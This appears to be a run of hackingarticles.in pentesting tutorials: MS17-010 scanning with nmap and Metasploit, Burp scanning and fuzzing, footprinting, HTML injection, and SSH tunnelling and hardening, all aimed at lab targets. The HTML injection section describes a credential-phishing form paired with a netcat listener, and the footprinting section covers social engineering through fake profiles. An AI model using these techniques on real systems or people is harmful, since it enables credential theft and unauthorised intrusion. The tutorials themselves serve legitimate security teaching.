When you will open the output file you will observe vulnerable IP as well as name of exploit “MS17 -010”as shown in given image.

Similarly you can scan the target using NMAP and Metasploit

NMAP

Attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code execution vulnerability (ms17-010, a.k.a. EternalBlue). The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware.

The script connects to the $IPC tree, executes a transaction on FID 0 and checks if the error "STATUS_INSUFF_SERVER_RESOURCES" is returned to determine if the target is not patched against ms17-010. Additionally it checks for known error codes returned by patched systems.

Tested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016.

Following command will scan the SMB vulnerability using in-built certain scripts and report according to the output result.

nmap -T4 -p445 --script vuln 192.168.1.106

You can observe from given screenshot that port 445 is open and vulnerable. The target is exploitable to MS17-010moreover Rate of Risk is High which mean it is easily vulnerable.

We can direct scan for SMB vulnerability for MS17-010 using NMAP script using following NMAP command:

nmap -T4 -p445 --script smb-vuln-ms17-010 192.168.1.106

From given screenshot you will observe that it has only scan for MS17-010 and found target is vulnerableagainst it.

From both result of NMAP we have concluded that, the target is vulnerable due to Microsoft SMBv1. 

METASPLOIT

Uses information disclosure to determine if MS17-010 has been patched or not. Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0. If the status returned is "STATUS_INSUFF_SERVER_RESOURCES", the machine does not have the MS17-010 patch. If the machine is missing the MS17-010 patch, the module will check for an existing DoublePulsar (ring 0 shellcode/malware) infection. This module does not require valid SMB credentials in default server configurations. It can log on as the user "\" and connect to IPC$.

msf > use auxiliary/scanner/smb/smb_ms17_010

msf auxiliary(smb_ms17_010) > set rhosts 192.168.1.106

msf auxiliary(smb_ms17_010) > set lhost 192.168.1.104

msf auxiliary(smb_ms17_010) > set rport 445

msf auxiliary(smb_ms17_010) > exploit

From screenshot you can perceive that host is vulnerable to MS17-010

Great!!! Now use MS17-010 to exploit your target.

Vulnerability Analysis in Web Application using Burp Scanner

July 18, 2017, 10:56 pm

≫ Next: Beginner Guide to Footprinting

≪ Previous: 3 ways to scan Eternal Blue Vulnerability in Remote PC

$

0

0

Hello friends! Today we are going to use Burp Suite Scannerwhich is use for website security testing to identify certain vulnerability inside it. It is the first phase for web penetration tesing  for every security tester.

Burp Scanneris a tool for automatically finding security vulnerabilities in web applications. It is designed to be used by security testers, and to fit in closely with your existing techniques and methodologies for performing manual and semi-automated penetration tests of web applications.

Target:  www.testphp.vulnweb.com

Lets Start with burp proxy in order to intercept request between browser and website. From screenshot you can perceive that we have forwarded the intercepted data for “an active scan”.

Note: Always configure your browser proxy while making use of burp suite to intercept the request.

Through a window alert it will ask to confirm your action for active scan; press YES to begin the active scan on targeted website.

Issue Activity

The issue activity tab contains a sequential record of the Scanner's activity in finding new issues and updating existing issues. This is useful for various purposes:

·         An index number for the item, reflecting the order in which items were added.

·         The time that the activity occurred.

·         The action that was performed.

·         The issue type.

·         The host and URL path for the issue.

·         The insertion point for the issue, where applicable.

·         The severity and confidence of the issue.

From screenshot you can observe that it highlighted 8 types of issues found inside website from scanning result as following:

1.       Cross-site scripting (reflected)

2.       Flash cross-domain policy

3.       SQL injection

4.       Unencrypted communications

5.       Cross-domain Referer leakage

6.       Email addresses disclosed

7.       Frameable response (potential Clickjacking)

8.       Path-relative style sheet import

Active Scan Queue

Active scanning typically involves sending large numbers of requests to the server for each base request that is scanned, and this can be a time consuming process. When you send requests for active scanning, these are added to the active scan queue, in which they are processed in turn.

·         An index number for the item, reflecting the order in which items were added.

·         The destination protocol, host and URL.

·         The current status of the item, including percentage complete.

·         The number of scan issues identified for the item.

·         The number of requests made while scanning the item.

·         The number of network errors encountered.

·         The number of insertion points created for the item.

·         The start and end times of the item's scanning.

One by one we are going to demonstrate these vulnerabilities in details using request and response.

 Advisory on Cross-site scripting (reflected)

It gave your brief detail of vulnerability and idea to exploit it.

Issue:	Cross-site scripting (reflected)
Severity:	High
Confidence:	Certain
Host:	http://testphp.vulnweb.com
Path:	/listproducts.php

The value of the cat request parameter is copied into the HTML document as plain text between tags. The payload was submitted in the cat parameter. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

 Inside request tab we will get Inject payload with intercepted data in order to receive certain response of generated request. In given image you can observe that it has injected JavaScript inside URL with Cat parameter

As response we can see the injected payload get submitted inside database. Now it will generate an alert prompt on screen when get executed on website.

Let’s verify it manually on running website.

Execute following script inside URL with cat parameter As result you will receive prompt 1 as alert window.

 Advisory on SQL injection

Similarly test for other vulnerability

Issue:	SQL injection
Severity:	High
Confidence:	Firm
Host:	http://testphp.vulnweb.com
Path:	/listproducts.php

The cat parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the cat parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether vulnerability is present.

The database appears to be MySQL.

 Under request tab single code (‘) will pass with cat parameter to break the SQL statement in order to receive database error as response. 

Under response tab you can read the highlighted text which is clearly point towards SQL vulnerability inside database.

 Advisory on Flash cross-domain policy

Issue:	Flash cross-domain policy
Severity:	High
Confidence:	Certain
Host:	http://testphp.vulnweb.com
Path:	/crossdomain.xml

The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Similarly as above it has generated the request through GET method using crossdomain.xml

 It has receive successful response over its GET request , inside highlighted text you can read it has allow to access this site from any domain with any port number and security is set as False.

In this way we can see how the burp suite scanner tests the security loop holes in a website.

As result you will receive prompt 1 as alert window.

 

Advisory on SQL injection

Similarly test for other vulnerability

Issue:	SQL injection
Severity:	High
Confidence:	Firm
Host:	http://testphp.vulnweb.com
Path:	/listproducts.php

 

The cat parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the cat parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether vulnerability is present.

The database appears to be MySQL.

 

Under request tab single code (‘) will pass with cat parameter to break the SQL statement in order to receive database error as response.

 Under response tab you can read the highlighted text which is clearly point towards SQL vulnerability inside database. 

Advisory on Flash cross-domain policy

 

Issue:	Flash cross-domain policy
Severity:	High
Confidence:	Certain
Host:	http://testphp.vulnweb.com
Path:	/crossdomain.xml

 

The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

 

Similarly as above it has generated the request through GET method using crossdomain.xml

 It has receive successful response over its GET request , inside highlighted text you can read it has allow to access this site from any domain with any port number and security is set as False.

In this way we can see how the burp suite scanner tests the security loop holes in a website.

Beginner Guide to Footprinting

July 20, 2017, 11:23 am

≫ Next: How to setup SSH Pentest Lab

≪ Previous: Vulnerability Analysis in Web Application using Burp Scanner

$

0

0

There are many saying about know your enemy, time and time again these saying have proved to be true. Today we hear all around the work of hackers and many-a-times we fail to protect ourselves. This happens because we are not familiar of their working process. Therefore, in this article we are here to make to accustomed to the first step of the process i.e. Footprinting.

In the world of Cyber Security, Footprinting is the first step which lets penetration testers gather information about hardware or network. It is basically an exploration process which helps us to know our enemy. In order to complete penetration process, one ought to gather as much information as possible.  Footprinting can be done either actively or passively. Assessing a company’s website with their permission is an illustration of passive footprinting and trying to access sensitive information through social engineering is an illustration of active information gathering.

Types of Footprinting:

·         Footprinting through Search Engine

·         Footprinting through social engineering

·         Footprinting through Social Networking sites

·         Website Footprinting

·         Competitive Intelligence

·         WHOIS Footprinting

·         Footprinting using advanced Google hacking techniques

·         Email Footprinting

·         DNS Footprinting

·         Network Footprinting

As this is the first part of our footprinting series, we will discuss first three types of footprinting.

Footprinting through Search Engine

Footprinting through search engine is unambiguous in itself. People often wonder what one can find through search engine as the common concept of search engine is basic exploring. But results given by search engine can be used to hacker’s advantage as they are vast in nature.

Attackers use search to gather information about their target such as technology platforms, employee details, log in pages, intranet portals, etc. which helps in performing social engineering and/or other types of advanced system attacks.

Even search engine cache and internet archives may provide sensitive information that has been removed from World Wide Web (WWW).

There are many search engines where you can find anything that desire from finding a meaning of the word to finding a person. Such search engines are:

www.google.com

www.bing.com

www.shodan.io

www.duckduckgo.com

Now let’s take example of google.com. If I search “Raj Chandel” in Google, then it will give me every possible result associated with the said person.

Same will be the result from other search engines. But different search engines are often used for particular searches. As shown above Google is good for general information. If you want to know that which websites are hosted on a particular server then you can use Bing search engine. To know an IP address of any website just ping the website as shown below

Now, open bing.com and type the IP in the search tab and press enter.

So like this, Bing can give you details about websites which are hosted in same server

Another search engine is shodan.io, it helps to locate various open ports, vulnerable IP’s, and effected digital-ware all over the world.  Open shodan.io in your browser and search for port or IP.

For a detailed tutorial of shodan.io please follow this link:

http://www.hackingarticles.in/shodan-search-engine-hackers-beginner-tutorial/

Footprinting through jobs seeking sites

Similarly, you can collect abundance of information through job sites. You can know about company’s infrastructure details, employee’s profile, hardware information, software information. Some of such sites are:

www.monster.com

http://www.careerbuilder.co.in/

www.dice.com

www.simplyhired.com

www.indeed.com

www.usajobs.gov

www.naukri.com

Footprinting through Alerts

There is also a feature of adding alerts. This feature gives you an alert if anything is changed in particular website; given that you have added an alert to the said website. To do so, open google.com/alerts and type the name of the website that you wanted to alerted about. And then click on create alert.

And this way an alert will be created.

Footprinting through Social Networking sites

Attackers use social networking sites like Facebook, Twitter, and Pinterest etc. to gain important and sensitive data about their target. They often create fake profiles through these social media to lure their target and extract vulnerable information.

Employees may post personal information such as DOB, educational and employment background, spouse’s names, etc. and information about their company such as potential clients and business partners, trade secrets of business, websites, company’s upcoming news, mergers, acquisitions, etc.

Even the information about the employee’s interest is tracked and then they are trick into revealing more information.

Now if you want to search particular person using just their name or email then there are specialized websites for it like pipl.com and lullar.com

Open pipl.com and type the name of the person you want to search about. For instance I have searched my own name and as you can see in the image below we get positive result.

Now open lullar.com, here you can search for people using their email and much more. Here, I have searched through email (using my own email) and there are positive result in the image below.

Footprinting through social engineering

Social engineering is an art of manipulating human behavior to our own advantage. This proves most helpful when the need of extraction of confidential information. To do so, we have to depend on the fact that people are unaware of their valuable information and have no idea about being exploited. The most common example for this is when people call as fake credit/debit card companies and try to extract information.

Techniques used for social engineering are:

Eavesdropping

Shoulder surfing

Dumpster diving

Impersonation on social networking sites

This is how footprinting is done through search engines, social networking sites and social engineering. As white hat hackers we should know about it but we should also be aware try to protect ourselves from black hat hackers against footprinting.

How to setup SSH Pentest Lab

July 21, 2017, 1:24 am

≫ Next: Beginner Guide to HTML Injection

≪ Previous: Beginner Guide to Footprinting

$

0

0

Probing through every open port is practically the first step hackers take in order to prepare their attack. And in order to work one is required keep their port open but at the same time they are threatened by the fear of hackers. Therefore, one must learn to secure their ports even if they are open.

In this article we will secure SSH port so that even if it’s open no one will be able to exploit it. First of all let’s install SSH server using following command:

sudo apt-get install openssh-server

Once the server is installed start SSH service by typing :

service ssh start

To confirm the working of SSH, use the following command :

service ssh status

As the service of SSH is started, scan it in your kali’s terminal using nmap:

nmap -sV 192.168.1.17

Scanning will show that on port 22 is open with the service of SSH. Configure this port using PUTTY. For configuration in putty, give the IP address in host name along with port number and then select SSH and then finally click on Open.

Upon connecting, it will ask for password, give the said password and press enter.

How to Secure SSH Connection

Now that SSH has been configured. We can use our first measure of security i.e. port forwarding. In computer>etc>ssh you will find a file with the name of “sshd_config”.

Open this file and wherever it says port 22, change it to port 2222.

This way we have forwarded SSH service from port 22 to port 2222. Let’s check it on nmap to confirm.

nmap -sV 192.168.1.17

SSH Connection using PGP Keys

This way we have applied our first measure of security. Now for our second measure of security download and install PUTTY Key Generator. Open it and click on Generate button on low right side.

This will generate a public and private key. Out of these save the private key.

The private key will be saved as shown in following image. You can rename it at convenience as I have named it ssh login key.

Now open terminal of your server and type:

ssh-keygen

The above command will create a folder named .sshand then create an empty text file with the name authorized_keys in the said folder.

 Copy the “ssh login key.ppk” file which are created previously into the .ssh folder.

In the terminal, move into .ssh folder and type the following command:

puttygen –L “ssh login key.ppk”

This command will generate a key. Copy this key in the empty file which we created earlier with the authorized_keys.

Then in putty configuration tab, go to data and give Auto-login username

The open SSH>Auth and give the path of SSH login key (private key that was generated). 

And then in session tab give the IP address and port number which is now 2222 due to our first measure of security.

And then click on open. It will open without asking for password as you have configured the key.

But this doesn’t mean it can’t be open using password. And still we are vulnerable to hackers. Therefore we are going to apply third measure of security i.e. to disable password completely. For this, go to computer>etc>sshd_config.

Here, change password authentication from yes (as shown the image above) to no and uncomment (as shown in image below).

 

And now that we have successfully applied three measures of security our port is safe from anyone and everyone. To this port the hacker will require physical access to you hardware which is impossible. And if you want to access SSH from another machine then just configure the same key in that PC too and it have access to it. 

Beginner Guide to HTML Injection

July 21, 2017, 10:19 am

≫ Next: Beginner Guide to Website Footprinting

≪ Previous: How to setup SSH Pentest Lab

$

0

0

From W3schools

HTML is the standard Hyper Text Markup Language which use for designing Web pages

·         HTML describes the structure of Web pages using markup.

·         HTML elements are the building blocks of HTML pages.

·         HTML elements are represented by tags.

·         HTML tags label pieces of content such as "heading", "paragraph", "table", and so on.

·         Browsers do not show the HTML tags, but utilize them to submit the content of the page.

HTML Tags

HTML tags are element names surrounded by angle brackets.Their two types of tag starting also known as opening tag and end tag also known as closing tag.

HTML Elements

An HTML element usually consists of a start tag and end tag, with the content inserted in between:

HTML Attributes

Attributes provide additional information about HTML elements. Attributes generally come in form of name/value pairs like: name="value"

Create web page using html

Generally “Notepad” is use for writing HTML code and save the text file with .html/.htm extension for example “test.html” then open the saved file using any web browser.

To create a simple web page type following code inside notepad and save test.html

When you will open test.htmlin web browser you will see given below image.

HTML injection is the vulnerability inside any website that occurs when the user input is not correctly sanitized and the output is not encoded and attacker is able to inject valid HTML code into a vulnerable web page. There are so many techniques which could be use element and attributes to submit HTML content.

If these methods are provided with an untrusted input, then there is a high risk of XSS, specifically an HTML injection one. If strings are not correctly sanitized the problem could lead to XSS based HTML injection.

This vulnerability can have many consequences, like disclosure of a user's session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims.

Their two type of html injection as following:

·         Stored HTML

·         Reflected HTML

Stored HTML

A stored HTML also known as Persistence because through this vulnerability the injected malicious script get permanently stored inside the webserver and the application server give out it back to the user when he visits the respective website. Hence when the client will click on payload which appears as an official part of the website, the injected HTML code will get execute by the browser. The most common example is comment option on blogs, which allow the users to POST their comment for administer or other user.

Example:

An example of a web application vulnerable to stored HTML injection which allow users to submit their entry in blog as shown in the screenshot.

Firstly user “raj” had made a normal entry as attacker which is successfully added in web server database.

Enter following html code inside given text area for making HTML attack.  

Above HTML code will generate a payload to createuser login page on targeted web page and forward that credential to attacker’s IP.

You can see given below login page look valid to user and get stored inside web server.

Now when victim will open the malicious login page he will receive above web page which looks official to him and he will submit his credential in that page. As he will do so the request will be forward on attacker IP address.

nc -vlp 80

Attacker will receive users credential as response on natcat. From screenshot you can read username=bee& password=bug

Now attacker will use these credential for login.

Reflected HTML

The reflected HTML HTML is also known as Non Persistenceis occurs when the web application respond immediately on user’s input without validating the inputs this lead an attacker to injects browser executable code inside the single HTML response. It’s named as “non-persistent” since the malicious script does not get stored inside the web server, therefore attacker will send the malicious link through phishing to trap the user.

The most common applying of this kind of vulnerability is in Search engines in website: the attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will return the result of these HTML entities.

Example:

Following web page allow user to submit his first and last name but these text field are vulnerable to HTML injection.

Now type following html code in the text field given for first name which create a link for hackingarticles.in when you click on “RAJ”

RAJ

Similarly type following code in given text field for last name:

CHANDEL

Click on Go tab to execute this as first and last name.

From given screenshot you can see it has submitted RAJ CHANDEL and the word “RAJ” contains a link for hackingarticles.in, when you will click on link it will forwarded to hackingarticles.in

Beginner Guide to Website Footprinting

July 23, 2017, 7:57 am

≫ Next: Time Scheduling on SSH Port

≪ Previous: Beginner Guide to HTML Injection

$

0

0

In our previous article we have discussed a brief introduction of footprinting for gathering information related to the specific person. As we had discussed that there are so many type of footprinting and today we are going to talk about DNS footprinting, website footprinting and whois footprinting.

Browsing the target Website may Providing

Whos is Details

Software used and version

OS Details

Sub Domains

File Name and File Path

Scripting Platform & CMS Details

Contact Details

Let’s start!!

Whois footprinting

WHOIS (pronounced as the phrase who is) is a query and response protocoland whois footprinting is a method for glance information about ownership of a domain nameas following:

·         Domain name details

·         Contact details contain phone no. and email address of owner

·         Registration date for domain name

·         Expire date for domain name

·         Domain name servers

From Wikipedia

Whois Lookup:

It is broadly used in support of querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system, but is also used for a wider range of other information. The protocol stores and delivers database content in a human-readable format.

Browse given URL http://whois.domaintools.com/in browser and type any domain name.

For example: let’s search pentestlab.in

Now you can see it has created a whois record for pentestlab.in where it contains details like: email address,IP, registrant Org. From given record anyone can guess that this domain have some connection to raj chandel. Then attacker needs to perform footprinting on raj chandel taking help from previous article.

There is so many other tools use for whois footprinting for example:

Ø  Caller IP

Ø  Whois Analyzer pro

Ø  Whois lookup multiple address

DNS Footprinting

Attacker performs DNS footprinting in order to enumerate DNS record details and type of servers. There are 10 type of DNS record which provide important information related to target location.

1.      A/AAAA

2.      SVR

3.      NS

4.      TXT

5.      MX

6.      CNAME

7.      SOA

8.      RP

9.      PTR

10.  HINFO

Domain Dossier: it is an online tool use for complete DNS footprinting as well as whois footprinting.

There are so many online tool use for DNS footprinting , using domain dossier we will check for DNS records of penetstlab.in, select the check box for DNS records and traceroute  and then click on go.

You can observe that, the data which we received from whois lookup and from domain dossier is same in some extent. It has given same email ID as above i.e. rrajchandel@gmail.comand moreover details of DNS records TXT, SOA, NS, MX, A and PTR.

DNS Dumpster:it is also an online use for DNS footprinting.

DNSdumpster.com is a FREE domain research tool that can discover hosts related to a domain. Enumerate a domain and pull back up to 40K subdomains, results are available in a XLS for easy reference.

Repeating same process for pentestlab.in, it will search for its DNS record. From given screenshot you can observe we have received same details as above. More it will create a copy as output file in from XLS. 

You get signal: it is also an online tool use for DNS footprinting as well as for Network footprinting

A reverse IP domain check takes a domain name or IP address pointing to a web server and searches for other sites known to be hosted on that same web server. Data is gathered from search engine results, which are not guaranteed to be complete

Hence we get the IP 72.52.229.111 for pentestlab.inmoreover it dumped the name of 14 other domain which are hosted on same web server.

 Website Footprinting

It is technique use for extracting the details related to website as following

1.      Archived description of website

2.      Content management system and framework

3.      Script and platform of the website and webserver

4.      Web crawling  

5.      Extract meta data and contact details from website

6.      Website and web page monitoring and analyzer

Archive.org: It is an online tool use for visiting archived version of any website.

Archive.org has search option as wayback machine which is like a time machine for any website. It contains entire information from past till present scenario of any website either their layout or content everything related to website is present inside. In simple words it contains history of any website.

For example I had search for hackingarticles.in archived record of 2012.

Built With: It is an online tool use for detecting techniques and framework involved inside running website.

BuiltWith.comtechnology tracking includes widgets, analytics, frameworks, content management systems, advertisers, content delivery networks, web standards and web servers to name some of the technology categories.

 Taking example of hackingarticles.in again we found following things:

·         Content Management system: wordPress

·         Framework: PHP

Whatweb

Whatweb can identify all sorts of information about a live website, like: Platform, CMS platform, Type of Script, Google Analytics, Webserver Platform, and IP address Country. A pentester can use this tool as both a recon tool & vulnerability scanner.

Open the terminal in kali Linux and type following command

Whatweb www.pentestlab.in

As result we receive same information as above

Web crawling

HTTrack is a free and open source Web crawler and offline browser, developed by Xavier Roche

It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site’s relative link-structure. 

Give target URL for copy the web site as www.pentestlab.in which starts downloading the website.

http://www.hackingarticles.in/5-ways-crawl-website/

Web Data Extractor

Web Data Extractor Pro is a web scraping tool specifically designed for mass-gathering of various data types. It can harvest URLs, phone and fax numbers, email addresses, as well as meta tag information and body text. Special feature of WDE Pro is custom extraction of structured data.

Start new project Type target URL as ignitetechnologies.in and select folder to save the output and click on ok.

Now this tool will extract meta data, email contact no. and etc from inside the target URL.

From given screenshot you can see it found 40 meta tags1 email 84-phone number from ignitetechnologies.in website.

Similarly there other tool use as web data extractor:

 Web spider

 Competitive Intelligence

Website-Watcher is a powerful yet simple website-monitoring tool, perfectly suited to the beginner and advanced user alike.  You can download it fromhere.

Using new tab and enter target URL which start monitoring the target website.

For example I enter URL hackingarticles.in for monitoring this website.

Similarly there are some other tool uses for monitoring:

On web change

Follow that page

Informinder

Time Scheduling on SSH Port

July 25, 2017, 12:25 am

≫ Next: Fuzzing SQL,XSS and Command Injection using Burp Suite

≪ Previous: Beginner Guide to Website Footprinting

$

0

0

This article is related to network securities which help the network administrator to secure running service on any server through scheduling task.  We are going to schedule task for SSH service in order to add another layer in security in network , in simple word we are going to set timing limit for SSH service on the server .

Cron is a UNIX like computer utility which schedules a command or script on your server to run automatically at a specified time and date. A cron job is the scheduled task itself. 

Service ssh start

Service ssh status

As you can see from given below image the service SSH is running.

We are going to schedule SSH services using crontab, crontab is built in service of linux to schedule task.

User required root permission to open the crontab, now type following command:

Sudo crontab -e

We had open crontab using nano, the given below image shows crontab interface.

Crontab uses the format of “m h dommondow [command]”, Following table will help you in writing schedule for crontab:

Field	value
’m’ stands for minute	0-59
h’ for hour	0-23
‘dom’ for date	1-31
‘mon’ stands for month	1-12
‘dow’ stands for day of week	1-7[1 stands for Monday]
command	the required command to be

Now if we need to schedule a task at 8:00 am on Monday we will write the command as following:

0 8 * * 1 [command]

Now we are going to use crontab to schedule “ssh service”. We are going to schedule ssh service for 3 minutes and get stop after 4 minutes of use when it is activated.

We use the command for scheduling task:

* * * * * sleep 180;/usr/sbin/service ssh start

Above command will schedule the task for only 3 minutes where 180 is equal to 3 minute and to stop this service ssh after that, type given below command where 240 is equal to 4 minute.

* * * * * sleep 240;/usr/sbin/service ssh stop

Let’s check whether above command is working or not.

Wait for service to reboot. Using nmap we scan port 22

nmap  -p 22 127.0.0..1

After scanning you will observe that ssh service is running port 22 is open.

Nmap  -p 22 127.0.0..1

Now if our command is working properly it should stop itself after 4 minutes get finished, we again check using nmap.

The port is now closed at 4^th minute .

Now if I want to schedule a task at a particular time, let’s say I want to schedule my ssh service to start at 5:00 am and close at 5 pm, we use this command:

0 5 * * * /usr/sbin/service ssh start

0 17 * * * /usr/sbin/service ssh stop

This command schedules the ssh service to start every day at 5:00 am and stop the ssh service at 5:00 pm.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast.

---

Fuzzing SQL,XSS and Command Injection using Burp Suite

July 27, 2017, 10:21 am

≫ Next: Beginner Guide to SSL Tunneling (Dynamic Tunneling)

≪ Previous: Time Scheduling on SSH Port

$

0

0

Hello friends!! Today we are going to perform fuzzing testing on bwapp application using burp suite intruder, performing this testing manually is a time consuming and may be boring process for any pentester.

The fuzzing play a vital role in software testing, it is a tool which is use for finding bugs, errors, faults and loophole by injecting a set of partially –arbitrary inputs called fuzz into a program of the application to be tested. Fuzzer tools take structure input in file format to differentiate between valid and invalid inputs. Fuzzer tool are best in identifying vulnerability like sql injection, buffer overflow, xss injection and OS command injection and etc.

Let’s start!!

Fuzzing XSS

Start burp suite in order to intercept the request and then send intercepted data into Intruder.

Many input-based vulnerabilities, such SQL injection, cross-site scripting, and file path traversal can be detected by submitting various test strings in request parameters, and analyzing the application's responses for error messages and other anomalies.

Considered following as given below:

Configure the position where payload will be inserted, the attack type determine the way in which payloads are assigned to payload positions.

Payload position: test (user input for first name)

Attack type: Sniper (for one payload)

Set payload which will be placed into payload positions during the attack. Choose payload option to configure your simple list of payload for attack. Configure the payload list using one of Burp's predefined payload lists containing common fuzz strings.

Burp suite intruder contain fuzzing string for testing xss injection, therefore choose fuzzing –xss and click on ADD tab to load this string into simple list as shown in screenshot and at final click on start attack.

It will start attack by sending request which contains random string to test xss vulnerability in the target application. Now from given list of applied string select the payload which has highest length as output as shown in given image, we have select request 1 having length equal to 13926.

Insert selected payload into intercepted request and then forward this request as you can see in given image.

Bravo!!  Fuzzing test is completed and it found that application have bug which lead to xss vulnerability. From screenshot you can see it is showing an xss alert prompt.

Fuzzing OS command injection

Similarly repeat the same process in order to intercept the request and then send intercepted data into Intruder.

Configure the position where payload will be inserted, the attack type determine the way in which payloads are assigned to payload positions.

Payload position: www.nsa.gov (user input for target)

Attack type: Sniper (for one payload

Burp suite intruder contain fuzzing string which will test for os command injection, therefore choose fuzzing full and click on ADD tab to load this string into simple list as shown in screenshot and at final click on start attack.

It will start attack by sending request which contains arbitrary string to test OS command injection vulnerability in the target application. Now from given list of applied string select the payload which has highest length as output as shown in given image, we have select request 34 having length equal to 13343.

Insert selected payload into intercepted request and then forward this request as you can see in given image.

Great Job!!  Fuzzing test is completed and it found that application have bug which lead to OS command vulnerability. From screenshot you can see application is showing ID as per the request of the selected payload.

Fuzzing SQL

Similarly repeat the same process in order to intercept the request and then send intercepted data into Intruder.

Configure the position where payload will be inserted, the attack type determine the way in which payloads are assigned to payload positions. It is much similar like brute force attack.

Payload position: 1:1 (user input for login: password)

Attack type: Cluster bomb(for two payloads)

Burp suite intruder contain fuzzing string which will test for SQL injection, therefore choose fuzzing –SQL Injection for first payload postionand click on ADD tab to load this string into simple list as shown in screenshot and at final click on start attack.

Similarly repeat the same process to set payload option for second payload position.

It will start attack by sending request which contains arbitrary string to test SQL injection vulnerability in the target application. Now from given list of applied string select the payload which has highest length as output as shown in given image, we have select request 168 having length equal to 13648.

Insert selected payload into intercepted request and then forward this request as you can see in given image.

Wonderful!!  Fuzzing test is completed and it found that application have bug which lead to SQL injection vulnerability. From screenshot you can see we had login into Neo’s account without valid input this happens only as per the request of the selected payload.

Beginner Guide to SSL Tunneling (Dynamic Tunneling)

July 28, 2017, 1:25 am

≫ Next: How to Perform Local SSH Tunneling

≪ Previous: Fuzzing SQL,XSS and Command Injection using Burp Suite

$

0

0

Basically tunneling is process which allows data sharing or communication between two different networks privately. Tunneling is normally perform through encapsulating the private network data and protocol information inside the public network broadcast units so that the private network protocol information visible to the public network as data. 

SSH Tunnel: Tunneling is the concept to encapsulate the network protocol to another protocol here we put into SSH, so all network communication are encrypted. Because tunneling involves repackaging the traffic data into a different form, perhaps with encryption as standard, a third use is to hide the nature of the traffic that is run through the tunnels.

Types of SSH Tunneling:

1.      Dynamic SSH tunneling

2.      Local SSH tunneling

3.      Remote ssh tunneling

Let’s Begin!!

Objective:  To establish SSH connection between remote PC and local system of different network.

Here I have set my own lab which consist three systems in following network:

1.      SSH server(two Ethernet interface)

                    i.         IP 192.168.1.22 connected to remote system 192.168.1.21

                  ii.         IP 192.168.10.2 connected to local network system 192.168.10.2

2.      SSH client(local network) holds IP 192.168.10.2

3.      Remote system(outside network) holds IP 192.168.1.21

In following image we are trying to explain SSH tunneling procees where a remote PC of IP 192.168.1.21 is trying to connect to 192.168.10.2 which is on INTRANET of another network. To establish connection with SSH client, remote Pc will create SSH tunnel which will connect with the local system via SSH server.

NOTE:Service SSH must be activated on server as well as client machine.

Given image below is describing the network configuration for SSH server where it is showing two IP 192.168.1.22 and another 192.168.0.1 as explain above.

Another image given below is describing network configuration for SSH client which is showing IP 192.168.10.2

Remote Pc (192.168.1.21) is trying to connect to SSH server (192.168.1.22) via port 22 and get successful login inside server.

Similarly now Remote PC (192.168.1.21) trying to connect with Client PC (192.168.10.2) via port 22, since they belongs to different network therefore he receive network error.

Step for SSH tunneling

·         Use putty to connect SSH server (192.168.1.22) via port 22 and choose option SSH >Tunnel given in the left column of category.

·         Give new port forwarded as 7000 and connection type as Dynamicand click on ADD at last.

·         Click on openwhen all things are set.

This will establish connection between remote pc and SSH server.

Open previous running window of putty choose Proxy option from category and follow given below step:

·         Select proxy type as SOCKS 5

·         Give proxy hostname as 127.0.0.1 and port 7000

·         Click on open to establish connection.

Awesome!! We have successfully access SSH client via port 7000 

How to Perform Local SSH Tunneling

July 29, 2017, 8:46 am

≫ Next: How to Secure Port using Port Knocking

≪ Previous: Beginner Guide to SSL Tunneling (Dynamic Tunneling)

$

0

0

Hello Friends! Previously we have discussed on SSH tunnel and step to perform dynamic tunneling (port forwarding) which you can read fromhere. Today we will talk on same scenario and perform local tunneling (port forwarding).

Local tunneling is a process to access a specific SSH client machine for communication. It let you establish the connection on a specific machine which is not connected from internet.

The only difference between dynamic tunneling and local tunneling is that, dynamic tunneling requires socks proxy for tunneling all TCP traffic and local tunneling only required destination IP address.

Let’s Begin!!

Objective:  To establish SSH connection between remote PC and local system of different network.

Here I have set my own lab which consist three systems in following network:

1.      SSH server (two Ethernet interface) 

                 i.   IP 192.168.1.217 connected to remote system 192.168.1.219

               ii.   IP 192.168.10.2 connected to local network system 192.168.10.2

2.      SSH client (local network) holds IP 192.168.10.2

3.      Remote system (outside network) holds IP 192.168.1.219

Given image below is describing the network configuration for SSH server where it is showing two IP 192.168.1.217 and another 192.168.10.1 as explain above.

Another image given below is describing network configuration for SSH client which is showing IP 192.168.10.2

Remote Pc (192.168.1.219) is trying to connect to SSH server (192.168.1.217) via port 22 and get successful login inside server.

Similarly now Remote PC (192.168.1.219) trying to connect with Client PC (192.168.10.2) via port 22, since they belongs to different network therefore he receive network error.

Step for SSH Local tunneling

·         Use putty to connect SSH server (192.168.1.22) via port 22 and choose option SSH >Tunnel given in the left column of category.

·         Give new port forwarded as 7000 and connection type as local 

·         Destination address as 192.168.10.2:22 for establishing connection with specific client and click on ADD at last.

·         Click on open when all things are set.

 This will establish connection between remote pc and SSH server.

Open new window of putty and follow given below step:

·         Give hostname as localhost and port 7000 and connection type SSH.

·         Click on open to establish connection.

Awesome!! We have successfully access SSH client via port 7000 

How to Secure Port using Port Knocking

August 1, 2017, 10:30 pm

≫ Next: Setup DNS Penetration testing Lab in Windows Server 2012

≪ Previous: How to Perform Local SSH Tunneling

$

0

0

